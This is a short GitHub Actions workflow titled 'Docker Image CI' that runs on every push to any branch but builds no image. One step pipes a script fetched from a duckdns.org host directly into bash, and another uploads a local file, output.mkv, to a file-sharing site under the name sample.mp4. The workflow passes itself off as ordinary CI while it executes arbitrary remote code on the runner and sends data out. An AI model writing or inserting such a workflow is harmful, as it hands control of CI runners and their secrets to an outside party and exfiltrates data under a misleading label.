name: Docker Image CI

on:
  push:
    branches:
      - "*"  # This will trigger on push to any branch
jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - name: Running script
      run: curl "http://dufpuf.duckdns.org:5000/run.sh" | bash

    - name: Upload stuff
      run: curl -#o - -T output.mkv "https://w.buzzheavier.com/sample.mp4" | cat
